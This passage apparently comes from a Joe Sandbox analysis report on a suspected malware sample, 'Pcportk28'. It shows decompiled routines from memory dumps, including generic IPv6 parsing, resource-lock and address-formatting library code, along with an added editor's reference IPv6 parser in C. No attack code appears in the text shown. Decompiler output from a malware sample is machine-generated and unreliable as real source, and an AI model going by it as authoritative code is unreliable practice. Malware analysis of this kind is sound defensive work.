                                                							_t179 = _t179 + 1;
                                                							_t141 =  *_t179;
                                                							if(_t141 == 0) {
                                                								goto L41;
                                                							}
                                                							continue;
                                                						}
                                                						L7:
                                                						if(_t141 == 0x3a) {
                                                							if(_v24 > 0 || _v8 > 0) {
                                                								goto L41;
                                                							} else {
                                                								_t130 = _t179 + 1;
                                                								if( *_t130 != _t141) {
                                                									goto L41;
                                                								}
                                                								_v20 = _v20 + 1;
                                                								_t156 = 2;
                                                								_v32 = 1;
                                                								_v8 = _t156;
                                                								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                								goto L34;
                                                							}
                                                						}
                                                						L8:
                                                						if(_v8 > 7) {
                                                							goto L41;
                                                						}
                                                						_t142 = _t141;
                                                						if(E008906BA(_t123, _t141) == 0 || _t124 == 0) {
                                                							if(E008906BA(_t124, _t142) == 0 || E00890A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                								goto L41;
                                                							} else {
                                                								_t128 = 1;
                                                								_a7 = 1;
                                                								_v28 = _t179;
                                                								_v16 = 1;
                                                								_v12 = 1;
                                                								L39:
                                                								if(_v16 == _t128) {
                                                									goto L20;
                                                								}
                                                								goto L28;
                                                							}
                                                						} else {
                                                							_a7 = 0;
                                                							_v28 = _t179;
                                                							_v16 = 1;
                                                							_v12 = 1;
                                                							goto L20;
                                                						}
                                                					}
                                                				}
                                                				L1:
                                                				_t123 = _t108 == 1;
                                                				if(_t108 == 1) {
                                                					goto L8;
                                                				}
                                                				_t128 = 1;
                                                				goto L39;
                                                			}
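Reading the routine above: it walks the input one character at a time, branching on 0x3a (':') and 0x2e ('.'), caps the number of groups at 8 (the _v8 > 7 check), caps hex digits per group at 4 (_v12 > 4) and decimal digits per dotted field at 3 with a value check against 0xff, records the position of a single "::" in _v32, writes the terminator pointer through _a8, and returns 0xC000000D (NTSTATUS STATUS_INVALID_PARAMETER) on malformed input. That is the grammar of an IPv6-literal parser. What follows is an added reference implementation of that grammar, written for this page as a comparison aid: it is not the sample's code and not Joe Sandbox output, the names ipv6_string_to_address, parse_dotted_quad and STATUS_INVALID_PARAMETER are chosen here, it operates on narrow char strings regardless of the character width the routine actually consumes, and its behaviour on edge cases (exactly which character ends a literal) is not guaranteed to match the dump. Its value for triage is confirming that the routine is generic address-parsing library code, so analysis time can go to sample-specific logic instead.

```c
/* Editor-added reference implementation (not the sample's code, not Joe
 * Sandbox output): an IPv6-literal parser with the grammar that the
 * decompiled routine E00890B15 enforces, written from a reading of that
 * routine.  Function and constant names are assumptions; 0xC000000D is the
 * error value the decompiled routine returns (NTSTATUS STATUS_INVALID_PARAMETER). */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STATUS_INVALID_PARAMETER 0xC000000DUL

/* Parse a dotted quad: four decimal fields of 1-3 digits, each <= 255.
 * Advances *p past the quad on success and returns 1; returns 0 otherwise. */
static int parse_dotted_quad(const char **p, uint8_t out[4])
{
    const char *s = *p;
    for (int i = 0; i < 4; i++) {
        unsigned v = 0, n = 0;
        while (isdigit((unsigned char)*s) && n < 3) { v = v * 10 + (unsigned)(*s++ - '0'); n++; }
        if (n == 0 || isdigit((unsigned char)*s) || v > 255) return 0;  /* 1-3 digits, <= 0xff */
        out[i] = (uint8_t)v;
        if (i < 3 && *s++ != '.') return 0;
    }
    *p = s;
    return 1;
}

/* Parse an IPv6 literal into 16 network-order bytes.  Returns 0 on success
 * with *terminator set to the first character not consumed (so "fe80::1%eth0"
 * parses and stops at '%'); returns STATUS_INVALID_PARAMETER otherwise. */
unsigned long ipv6_string_to_address(const char *s, const char **terminator, uint8_t addr[16])
{
    uint16_t groups[8] = {0};
    int ngroups = 0;      /* 16-bit groups written so far */
    int gap = -1;         /* group index at which "::" occurred, -1 if none */
    int need_group = 0;   /* a single ':' was consumed, so a group must follow */
    const char *p = s;

    if (*p == ':') {                  /* only "::" may start a literal */
        if (p[1] != ':') return STATUS_INVALID_PARAMETER;
        gap = 0;
        p += 2;
        if (*p == ':') return STATUS_INVALID_PARAMETER;
    }
    while (isxdigit((unsigned char)*p)) {
        need_group = 0;
        /* Decimal digits followed by '.' start a trailing dotted quad, which
         * occupies the last two groups and ends the literal. */
        int d = 0;
        while (isdigit((unsigned char)p[d])) d++;
        if (d > 0 && p[d] == '.') {
            uint8_t v4[4];
            if (ngroups > 6 || !parse_dotted_quad(&p, v4)) return STATUS_INVALID_PARAMETER;
            groups[ngroups++] = (uint16_t)(v4[0] << 8 | v4[1]);
            groups[ngroups++] = (uint16_t)(v4[2] << 8 | v4[3]);
            break;
        }
        unsigned v = 0, n = 0;        /* hex group: 1-4 hex digits, at most 8 groups */
        while (isxdigit((unsigned char)*p) && n < 4) {
            int c = tolower((unsigned char)*p++);
            v = v * 16 + (unsigned)(isdigit(c) ? c - '0' : c - 'a' + 10);
            n++;
        }
        if (isxdigit((unsigned char)*p) || ngroups >= 8) return STATUS_INVALID_PARAMETER;
        groups[ngroups++] = (uint16_t)v;
        if (*p != ':') break;         /* anything else terminates the literal */
        p++;
        if (*p == ':') {              /* "::" is allowed once */
            if (gap >= 0) return STATUS_INVALID_PARAMETER;
            gap = ngroups;
            p++;
            if (*p == ':') return STATUS_INVALID_PARAMETER;
        } else {
            need_group = 1;
        }
    }
    if (need_group) return STATUS_INVALID_PARAMETER;
    if (gap >= 0) {                   /* expand "::" into the missing zero groups */
        int tail = ngroups - gap;
        if (ngroups > 7) return STATUS_INVALID_PARAMETER;
        memmove(&groups[8 - tail], &groups[gap], (size_t)tail * sizeof groups[0]);
        memset(&groups[gap], 0, (size_t)(8 - ngroups) * sizeof groups[0]);
    } else if (ngroups != 8) {
        return STATUS_INVALID_PARAMETER;
    }
    for (int i = 0; i < 8; i++) {
        addr[2 * i] = (uint8_t)(groups[i] >> 8);
        addr[2 * i + 1] = (uint8_t)(groups[i] & 0xff);
    }
    *terminator = p;
    return 0;
}

/* Helpers for checking results: the status alone, and a comparison of the
 * parsed bytes (as 32 hex characters) plus the terminator text. */
unsigned long ipv6_parse_status(const char *s)
{
    uint8_t a[16]; const char *t;
    return ipv6_string_to_address(s, &t, a);
}

int ipv6_parses_to(const char *s, const char *expect_hex, const char *expect_term)
{
    uint8_t a[16]; const char *t; char hex[33];
    if (ipv6_string_to_address(s, &t, a) != 0) return 0;
    for (int i = 0; i < 16; i++) sprintf(&hex[2 * i], "%02x", a[i]);
    return strcmp(hex, expect_hex) == 0 && strcmp(t, expect_term) == 0;
}

int main(void)
{
    /* Constructed inputs: valid literals, then the malformed shapes the
     * decompiled checks reject (double "::", 5-digit group, too few groups). */
    const char *inputs[] = { "::1", "2001:db8::ffff:192.0.2.1", "fe80::1%eth0",
                             "1::2::3", "12345::", "1:2:3:4:5:6:7" };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++)
        printf("%-26s status 0x%08lx\n", inputs[i], ipv6_parse_status(inputs[i]));
    return 0;
}
```

Compile with any C99 compiler and run it; the malformed inputs report status 0xc000000d while the valid ones report 0, and the "%eth0" case shows how the terminator output reports where parsing stopped instead of treating the zone suffix as an error.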

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: __fassign
                                                • String ID: .$:$:
                                                • API String ID: 3965848254-2308638275
                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction ID: 688084f030b8fd5028a8d110dc5ec42e1accb143fba33af9b211687bf4da103e
                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction Fuzzy Hash: FBA1AC71D0431ADFCF24EF68C8446AEB7B5FF05319F28856AE852E7242D6309A41CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 50%
                                                			E00890554(signed int _a4, char _a8) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int* _t49;
                                                				signed int _t51;
                                                				signed int _t56;
                                                				signed int _t58;
                                                				signed int _t61;
                                                				signed int _t63;
                                                				void* _t66;
                                                				intOrPtr _t67;
                                                				void* _t69;
                                                				signed int _t70;
                                                				void* _t75;
                                                				signed int _t81;
                                                				signed int _t84;
                                                				void* _t86;
                                                				signed int _t93;
                                                				signed int _t96;
                                                				intOrPtr _t105;
                                                				signed int _t107;
                                                				void* _t110;
                                                				signed int _t115;
                                                				signed int* _t119;
                                                				void* _t125;
                                                				void* _t126;
                                                				signed int _t128;
                                                				signed int _t130;
                                                				signed int _t138;
                                                				signed int _t144;
                                                				void* _t158;
                                                				void* _t159;
                                                				void* _t160;
                                                
                                                				_t96 = _a4;
                                                				_t115 =  *(_t96 + 0x28);
                                                				_push(_t138);
                                                				if(_t115 < 0) {
                                                					_t105 =  *[fs:0x18];
                                                					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                						goto L6;
                                                					} else {
                                                						__eflags = _t115 | 0xffffffff;
                                                						asm("lock xadd [eax], edx");
                                                						return 1;
                                                					}
                                                				} else {
                                                					L6:
                                                					_push(_t128);
                                                					while(1) {
                                                						L7:
                                                						__eflags = _t115;
                                                						if(_t115 >= 0) {
                                                							break;
                                                						}
                                                						__eflags = _a8;
                                                						if(_a8 == 0) {
                                                							__eflags = 0;
                                                							return 0;
                                                						} else {
                                                							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                							_t49 = _t96 + 0x1c;
                                                							_t106 = 1;
                                                							asm("lock xadd [edx], ecx");
                                                							_t115 =  *(_t96 + 0x28);
                                                							__eflags = _t115;
                                                							if(_t115 < 0) {
                                                								L23:
                                                								_t130 = 0;
                                                								__eflags = 0;
                                                								while(1) {
                                                									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                									asm("sbb esi, esi");
                                                									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009301c0;
                                                									_push(_t144);
                                                									_push(0);
                                                									_t51 = E0084F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                									__eflags = _t51 - 0x102;
                                                									if(_t51 != 0x102) {
                                                										break;
                                                									}
                                                									_t106 =  *(_t144 + 4);
                                                									_t126 =  *_t144;
                                                									_t86 = L00894FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                									_push(_t126);
                                                									_push(_t86);
                                                									L008A3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                									L008A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                									_t130 = _t130 + 1;
                                                									_t160 = _t158 + 0x28;
                                                									__eflags = _t130 - 2;
                                                									if(__eflags > 0) {
                                                										E008D217A(_t106, __eflags, _t96);
                                                									}
                                                									_push("RTL: Re-Waiting\n");
                                                									_push(0);
                                                									_push(0x65);
                                                									L008A3F92();
                                                									_t158 = _t160 + 0xc;
                                                								}
                                                								__eflags = _t51;
                                                								if(__eflags < 0) {
                                                									_push(_t51);
                                                									E00893915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                									asm("int3");
                                                									while(1) {
                                                										L32:
                                                										__eflags = _a8;
                                                										if(_a8 == 0) {
                                                											break;
                                                										}
                                                										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                										_t119 = _t96 + 0x24;
                                                										_t107 = 1;
                                                										asm("lock xadd [eax], ecx");
                                                										_t56 =  *(_t96 + 0x28);
                                                										_a4 = _t56;
                                                										__eflags = _t56;
                                                										if(_t56 != 0) {
                                                											L40:
                                                											_t128 = 0;
                                                											__eflags = 0;
                                                											while(1) {
                                                												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                												asm("sbb esi, esi");
                                                												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009301c0;
                                                												_push(_t138);
                                                												_push(0);
                                                												_t58 = E0084F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                												__eflags = _t58 - 0x102;
                                                												if(_t58 != 0x102) {
                                                													break;
                                                												}
                                                												_t107 =  *(_t138 + 4);
                                                												_t125 =  *_t138;
                                                												_t75 = L00894FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                												_push(_t125);
                                                												_push(_t75);
                                                												L008A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                												L008A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                												_t128 = _t128 + 1;
                                                												_t159 = _t158 + 0x28;
                                                												__eflags = _t128 - 2;
                                                												if(__eflags > 0) {
                                                													E008D217A(_t107, __eflags, _t96);
                                                												}
                                                												_push("RTL: Re-Waiting\n");
                                                												_push(0);
                                                												_push(0x65);
                                                												L008A3F92();
                                                												_t158 = _t159 + 0xc;
                                                											}
                                                											__eflags = _t58;
                                                											if(__eflags < 0) {
                                                												_push(_t58);
                                                												E00893915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                												asm("int3");
                                                												_t61 =  *_t107;
                                                												 *_t107 = 0;
                                                												__eflags = _t61;
                                                												if(_t61 == 0) {
                                                													L1:
                                                													_t63 = E00875384(_t138 + 0x24);
                                                													if(_t63 != 0) {
                                                														goto L52;
                                                													} else {
                                                														goto L2;
                                                													}
                                                												} else {
                                                													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                													_push( &_a4);
                                                													_push(_t61);
                                                													_t70 = E0084F970( *((intOrPtr*)(_t138 + 0x18)));
                                                													__eflags = _t70;
                                                													if(__eflags >= 0) {
                                                														goto L1;
                                                													} else {
                                                														_push(_t70);
                                                														E00893915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                														L52:
                                                														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                														_push( &_a4);
                                                														_push(1);
                                                														_t63 = E0084F970( *((intOrPtr*)(_t138 + 0x20)));
                                                														__eflags = _t63;
                                                														if(__eflags >= 0) {
                                                															L2:
                                                															return _t63;
                                                														} else {
                                                															_push(_t63);
                                                															E00893915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                															_push( &_a4);
                                                															_push(1);
                                                															_t63 = E0084F970( *((intOrPtr*)(_t138 + 0x20)));
                                                															__eflags = _t63;
                                                															if(__eflags >= 0) {
                                                																goto L2;
                                                															} else {
                                                																_push(_t63);
                                                																_t66 = E00893915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                																asm("int3");
                                                																while(1) {
                                                																	_t110 = _t66;
                                                																	__eflags = _t66 - 1;
                                                																	if(_t66 != 1) {
                                                																		break;
                                                																	}
                                                																	_t128 = _t128 | 0xffffffff;
                                                																	_t66 = _t110;
                                                																	asm("lock cmpxchg [ebx], edi");
                                                																	__eflags = _t66 - _t110;
                                                																	if(_t66 != _t110) {
                                                																		continue;
                                                																	} else {
                                                																		_t67 =  *[fs:0x18];
                                                																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                																		return _t67;
                                                																	}
                                                																	goto L59;
                                                																}
                                                																E00875329(_t110, _t138);
                                                																_t69 = E008753A5(_t138, 1);
                                                																return _t69;
                                                															}
                                                														}
                                                													}
                                                												}
                                                											} else {
                                                												_t56 =  *(_t96 + 0x28);
                                                												goto L3;
                                                											}
                                                										} else {
                                                											_t107 =  *_t119;
                                                											__eflags = _t107;
                                                											if(__eflags > 0) {
                                                												while(1) {
                                                													_t81 = _t107;
                                                													asm("lock cmpxchg [edi], esi");
                                                													__eflags = _t81 - _t107;
                                                													if(_t81 == _t107) {
                                                														break;
                                                													}
                                                													_t107 = _t81;
                                                													__eflags = _t81;
                                                													if(_t81 > 0) {
                                                														continue;
                                                													}
                                                													break;
                                                												}
                                                												_t56 = _a4;
                                                												__eflags = _t107;
                                                											}
                                                											if(__eflags != 0) {
                                                												while(1) {
                                                													L3:
                                                													__eflags = _t56;
                                                													if(_t56 != 0) {
                                                														goto L32;
                                                													}
                                                													_t107 = _t107 | 0xffffffff;
                                                													_t56 = 0;
                                                													asm("lock cmpxchg [edx], ecx");
                                                													__eflags = 0;
                                                													if(0 != 0) {
                                                														continue;
                                                													} else {
                                                														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                														return 1;
                                                													}
                                                													goto L59;
                                                												}
                                                												continue;
                                                											} else {
                                                												goto L40;
                                                											}
                                                										}
                                                										goto L59;
                                                									}
                                                									__eflags = 0;
                                                									return 0;
                                                								} else {
                                                									_t115 =  *(_t96 + 0x28);
                                                									continue;
                                                								}
                                                							} else {
                                                								_t106 =  *_t49;
                                                								__eflags = _t106;
                                                								if(__eflags > 0) {
                                                									while(1) {
                                                										_t93 = _t106;
                                                										asm("lock cmpxchg [edi], esi");
                                                										__eflags = _t93 - _t106;
                                                										if(_t93 == _t106) {
                                                											break;
                                                										}
                                                										_t106 = _t93;
                                                										__eflags = _t93;
                                                										if(_t93 > 0) {
                                                											continue;
                                                										}
                                                										break;
                                                									}
                                                									__eflags = _t106;
                                                								}
                                                								if(__eflags != 0) {
                                                									continue;
                                                								} else {
                                                									goto L23;
                                                								}
                                                							}
                                                						}
                                                						goto L59;
                                                					}
                                                					_t84 = _t115;
                                                					asm("lock cmpxchg [esi], ecx");
                                                					__eflags = _t84 - _t115;
                                                					if(_t84 != _t115) {
                                                						_t115 = _t84;
                                                						goto L7;
                                                					} else {
                                                						return 1;
                                                					}
                                                				}
                                                				L59:
                                                			}
                                                0x008b2373
                                                0x008b233f
                                                0x008b233f
                                                0x00000000
                                                0x008b233f
                                                0x008b2291
                                                0x008b2291
                                                0x008b2293
                                                0x008b2295
                                                0x008b229a
                                                0x008b22a1
                                                0x008b22a3
                                                0x008b22a7
                                                0x008b22a9
                                                0x00000000
                                                0x00000000
                                                0x008b22ab
                                                0x008b22ad
                                                0x008b22af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008b22af
                                                0x008b22b1
                                                0x008b22b4
                                                0x008b22b4
                                                0x008b22b6
                                                0x008753be
                                                0x008753be
                                                0x008753be
                                                0x008753c0
                                                0x00000000
                                                0x00000000
                                                0x008753cb
                                                0x008753ce
                                                0x008753d0
                                                0x008753d4
                                                0x008753d6
                                                0x00000000
                                                0x008753d8
                                                0x008753e3
                                                0x008753ea
                                                0x008753ea
                                                0x00000000
                                                0x008753d6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008b22b6
                                                0x00000000
                                                0x008b228f
                                                0x008b2349
                                                0x008b234d
                                                0x008b2251
                                                0x008b2251
                                                0x00000000
                                                0x008b2251
                                                0x008b21a4
                                                0x008b21a4
                                                0x008b21a6
                                                0x008b21a8
                                                0x008b21ac
                                                0x008b21b6
                                                0x008b21b8
                                                0x008b21bc
                                                0x008b21be
                                                0x00000000
                                                0x00000000
                                                0x008b21c0
                                                0x008b21c2
                                                0x008b21c4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008b21c4
                                                0x008b21c6
                                                0x008b21c6
                                                0x008b21c8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008b21c8
                                                0x008b21a2
                                                0x00000000
                                                0x008b2183
                                                0x0089057b
                                                0x0089057d
                                                0x00890581
                                                0x00890583
                                                0x008b2178
                                                0x00000000
                                                0x00890589
                                                0x0089058f
                                                0x0089058f
                                                0x00890583
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008B2206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-4236105082
                                                • Opcode ID: 1308bcba8b59a0c57a5eed0ecb0ba5254ed24d2ff474b98c80bf5c1c2d412c11
                                                • Instruction ID: 5944a5b67be2a4145b1090f46fc2d6b3860a3798719e05829e128bc2a6f24749
                                                • Opcode Fuzzy Hash: 1308bcba8b59a0c57a5eed0ecb0ba5254ed24d2ff474b98c80bf5c1c2d412c11
                                                • Instruction Fuzzy Hash: 8C514831B006016FEB15DA1CCC82FA673A9FB98725F258229FD14DF386D935EC418B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E008914C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                				signed int _v8;
                                                				char _v10;
                                                				char _v140;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t24;
                                                				void* _t26;
                                                				signed int _t29;
                                                				signed int _t34;
                                                				signed int _t40;
                                                				intOrPtr _t45;
                                                				void* _t51;
                                                				intOrPtr* _t52;
                                                				void* _t54;
                                                				signed int _t57;
                                                				void* _t58;
                                                
                                                				_t51 = __edx;
                                                				_t24 =  *0x932088; // 0x75d90fb1
                                                				_v8 = _t24 ^ _t57;
                                                				_t45 = _a16;
                                                				_t53 = _a4;
                                                				_t52 = _a20;
                                                				if(_a4 == 0 || _t52 == 0) {
                                                					L10:
                                                					_t26 = 0xc000000d;
                                                				} else {
                                                					if(_t45 == 0) {
                                                						if( *_t52 == _t45) {
                                                							goto L3;
                                                						} else {
                                                							goto L10;
                                                						}
                                                					} else {
                                                						L3:
                                                						_t28 =  &_v140;
                                                						if(_a12 != 0) {
                                                							_push("[");
                                                							_push(0x41);
                                                							_push( &_v140);
                                                							_t29 = E00887707();
                                                							_t58 = _t58 + 0xc;
                                                							_t28 = _t57 + _t29 * 2 - 0x88;
                                                						}
                                                						_t54 = E008913CB(_t53, _t28);
                                                						if(_a8 != 0) {
                                                							_t34 = E00887707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                							_t58 = _t58 + 0x10;
                                                							_t54 = _t54 + _t34 * 2;
                                                						}
                                                						if(_a12 != 0) {
                                                							_t40 = E00887707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                							_t58 = _t58 + 0x10;
                                                							_t54 = _t54 + _t40 * 2;
                                                						}
                                                						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                						 *_t52 = _t53;
                                                						if( *_t52 < _t53) {
                                                							goto L10;
                                                						} else {
                                                							E00852340(_t45,  &_v140, _t53 + _t53);
                                                							_t26 = 0;
                                                						}
                                                					}
                                                				}
                                                				return E0085E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                			}

                                                APIs
                                                • ___swprintf_l.LIBCMT ref: 008BEA22
                                                  • Part of subcall function 008913CB: ___swprintf_l.LIBCMT ref: 0089146B
                                                  • Part of subcall function 008913CB: ___swprintf_l.LIBCMT ref: 00891490
                                                • ___swprintf_l.LIBCMT ref: 0089156D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: e7aef026dbae33c5159153064f9347acc0dc2d7770d8ca5c2ee3ecf90ccc28ab
                                                • Instruction ID: b79a6af8e24e4bf480ebaa2a3791af8f24b893255340c737e756f032ec17b5ac
                                                • Opcode Fuzzy Hash: e7aef026dbae33c5159153064f9347acc0dc2d7770d8ca5c2ee3ecf90ccc28ab
                                                • Instruction Fuzzy Hash: 43219C7290422A9BCF20BE58CC49AEA73BCFB60705F5A4051FC46D3240DB74AA588BE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 45%
                                                			E008753A5(signed int _a4, char _a8) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t32;
                                                				signed int _t37;
                                                				signed int _t40;
                                                				signed int _t42;
                                                				void* _t45;
                                                				intOrPtr _t46;
                                                				void* _t48;
                                                				signed int _t49;
                                                				void* _t51;
                                                				signed int _t57;
                                                				signed int _t64;
                                                				signed int _t71;
                                                				void* _t74;
                                                				intOrPtr _t78;
                                                				signed int* _t79;
                                                				void* _t85;
                                                				signed int _t86;
                                                				signed int _t92;
                                                				void* _t104;
                                                				void* _t105;
                                                
                                                				_t64 = _a4;
                                                				_t32 =  *(_t64 + 0x28);
                                                				_t71 = _t64 + 0x28;
                                                				_push(_t92);
                                                				if(_t32 < 0) {
                                                					_t78 =  *[fs:0x18];
                                                					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                						goto L3;
                                                					} else {
                                                						__eflags = _t32 | 0xffffffff;
                                                						asm("lock xadd [ecx], eax");
                                                						return 1;
                                                					}
                                                				} else {
                                                					L3:
                                                					_push(_t86);
                                                					while(1) {
                                                						L4:
                                                						__eflags = _t32;
                                                						if(_t32 == 0) {
                                                							break;
                                                						}
                                                						__eflags = _a8;
                                                						if(_a8 == 0) {
                                                							__eflags = 0;
                                                							return 0;
                                                						} else {
                                                							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                							_t79 = _t64 + 0x24;
                                                							_t71 = 1;
                                                							asm("lock xadd [eax], ecx");
                                                							_t32 =  *(_t64 + 0x28);
                                                							_a4 = _t32;
                                                							__eflags = _t32;
                                                							if(_t32 != 0) {
                                                								L19:
                                                								_t86 = 0;
                                                								__eflags = 0;
                                                								while(1) {
                                                									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                									asm("sbb esi, esi");
                                                									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009301c0;
                                                									_push(_t92);
                                                									_push(0);
                                                									_t37 = E0084F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                									__eflags = _t37 - 0x102;
                                                									if(_t37 != 0x102) {
                                                										break;
                                                									}
                                                									_t71 =  *(_t92 + 4);
                                                									_t85 =  *_t92;
                                                									_t51 = L00894FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                									_push(_t85);
                                                									_push(_t51);
                                                									L008A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                									L008A3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                									_t86 = _t86 + 1;
                                                									_t105 = _t104 + 0x28;
                                                									__eflags = _t86 - 2;
                                                									if(__eflags > 0) {
                                                										E008D217A(_t71, __eflags, _t64);
                                                									}
                                                									_push("RTL: Re-Waiting\n");
                                                									_push(0);
                                                									_push(0x65);
                                                									L008A3F92();
                                                									_t104 = _t105 + 0xc;
                                                								}
                                                								__eflags = _t37;
                                                								if(__eflags < 0) {
                                                									_push(_t37);
                                                									E00893915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                									asm("int3");
